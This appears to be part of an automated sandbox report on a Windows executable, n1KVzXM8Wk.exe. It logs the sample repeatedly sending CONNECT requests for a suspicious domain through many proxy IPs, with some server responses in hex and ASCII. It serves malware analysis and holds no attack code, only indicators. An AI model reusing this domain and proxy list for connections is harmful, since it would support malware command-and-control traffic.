                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2038192.168.2.455518172.67.209.12806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:35.797684908 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.884974003 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:35 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2039192.168.2.45538672.195.34.5941456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:35.809968948 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2040192.168.2.455521209.145.56.51185086812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:35.872862101 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2041192.168.2.455520204.236.176.61806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:36.715373039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.880242109 CET167INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 23 Feb 2024 08:45:36 GMT
                                                                                                      Content-Type: text/plain
                                                                                                      X-Powered-By: PHP/5.5.9-1ubuntu4.21
                                                                                                      Server: Apache Tomcat/4.0.3
                                                                                                      Content-Length: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2042192.168.2.455270192.111.129.145168946812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:36.715677977 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2043192.168.2.45543242.61.48.21980006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:36.715820074 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.549911976 CET174INHTTP/1.1 503 Service Unavailable
                                                                                                      content-length: 18
                                                                                                      content-type: text/plain
                                                                                                      date: Fri, 23 Feb 2024 08:25:43 GMT
                                                                                                      server: svcproxy
                                                                                                      connection: close
                                                                                                      Data Raw: 44 4e 53 20 63 61 63 68 65 20 6f 76 65 72 66 6c 6f 77
                                                                                                      Data Ascii: DNS cache overflow


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2044192.168.2.455528104.20.123.164806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:36.715945959 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.803188086 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:36 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2045192.168.2.455527184.170.248.541456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:36.718175888 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2046192.168.2.45553145.61.188.134444996812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:36.720944881 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2047192.168.2.454138162.241.74.136640106812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:36.748692036 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.865715981 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:42.865849972 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:48.881325006 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2048192.168.2.45535545.167.124.309996812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:36.748743057 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.562876940 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2049192.168.2.45063150.63.13.3125396812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:36.748786926 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.178487062 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.682466984 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2050192.168.2.455027162.240.22.184434946812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:36.749459028 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.865712881 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:42.865875959 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2051192.168.2.455384156.200.116.7319816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:36.823736906 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.865813971 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:42.865859985 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:48.881426096 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:00.881227016 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:12.943660021 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2052192.168.2.455353148.72.211.168571856812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:36.826416016 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.682349920 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2053192.168.2.455322184.178.172.1141456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:36.827275991 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2054192.168.2.455538154.12.178.107299856812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:36.841387987 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2055192.168.2.4555405.44.42.82108086812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:36.854631901 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2056192.168.2.455534171.247.243.23110806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:36.854919910 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2057192.168.2.45553336.64.238.8210806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:36.864339113 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2058192.168.2.45539764.227.108.25319086812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.061029911 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2059192.168.2.454231166.62.38.10024536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.144921064 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2060192.168.2.455005117.160.250.130806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.145126104 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.705303907 CET303INHTTP/1.1 400 Bad Request
                                                                                                      Server: openresty
                                                                                                      Date: Fri, 23 Feb 2024 08:45:37 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 154
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2061192.168.2.45081191.121.88.5380106812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.157880068 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.292917013 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2062192.168.2.45078645.80.151.3331286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.157943010 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.293005943 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2063192.168.2.455548202.159.60.654436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.158025026 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2064192.168.2.455129107.152.98.541456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.170737028 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2065192.168.2.45074551.210.45.148596126812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.170789003 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.293004990 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2066192.168.2.455545185.238.228.96806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.171473980 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.258357048 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:37 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2067192.168.2.45555141.86.252.914436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.175451994 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2068192.168.2.45089051.210.4.123579696812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.177639961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.178334951 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2069192.168.2.454307162.240.39.58628586812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.177700043 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2070192.168.2.45416847.90.126.7881186812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.184653997 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.429470062 CET132INHTTP/1.1 503 Too many open connections
                                                                                                      Content-Type: text/plain
                                                                                                      Connection: close
                                                                                                      Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0d 0a
                                                                                                      Data Ascii: Maximum number of open connections reached.


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2071192.168.2.45545089.36.114.38806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.187438965 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2072192.168.2.450809212.127.93.18580816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.203068972 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2073192.168.2.455436175.183.82.22181976812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.203273058 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2074192.168.2.454250109.205.181.27257836812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.218391895 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2075192.168.2.4550351.10.170.22541456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.231300116 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2076192.168.2.455459131.186.37.9980806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.231425047 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2077192.168.2.45548697.79.238.65485766812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.231523991 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.293139935 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


